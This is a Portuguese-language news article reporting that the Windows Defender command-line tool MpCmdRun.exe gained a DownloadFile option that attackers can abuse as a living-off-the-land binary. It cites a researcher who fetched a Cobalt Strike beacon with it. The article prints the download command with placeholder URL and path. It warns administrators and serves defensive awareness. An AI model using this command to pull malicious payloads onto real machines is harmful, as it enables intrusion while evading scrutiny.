O Windows Defender se transforma em um aplicativo perigoso para administradores

O Windows Defender no Windows 10 é a primeira linha de defesa em caso de ataques de malware e faz um muito bom trabalho também.

Porém, em uma de suas novas atualizações, o poderoso antivírus ganhou um novo comando DownloadFile, que permitirá a qualquer pessoa baixar qualquer arquivo de uma URL para um determinado caminho em seu computador.

Podemos chamar isso de exploit, pois também pode ser usado até mesmo para baixar malware, algo que foi descoberto pelo pesquisador de segurança Mohammad Askar, que postou sua descoberta no Twitter.

Como o Windows Defender pode ser usado para baixar malware?

É realmente simples usar o utilitário de linha de comando do serviço Microsoft Antimalware (MpCmdRun.exe) para baixar qualquer arquivo de uma fonte externa para o seu computador.

MpCmdRun.exe -DownloadFile -url [url] -path [path_to_save_file]

Em sua tentativa, Askar conseguiu baixar o Cobalt Strike beacon, uma ferramenta de ataque bem conhecida usando esta linha de comando.

O novo comando está incluído na versão 4.18.2007.8-0 e posteriores, o que dá um bom tempo de início para os atacantes.

Basicamente, esse recurso transforma Windows Defender em um LOLBIN (que vive fora dos binários de linha), um arquivo de sistema inofensivo que pode ser usado para fins maliciosos.

Felizmente, depois de baixar o arquivo prejudicial, ele será detectado pelo mesmo Windows Defender ou por outro software antivírus se presente.

De um software de proteção confiável, o Windows Defender se transformou em outra possível ameaça que terá de ser monitorada de perto por administradores e especialistas em segurança.

Se você tiver alguma sugestão ou comentário, deixe-os abaixo na seção Comentários.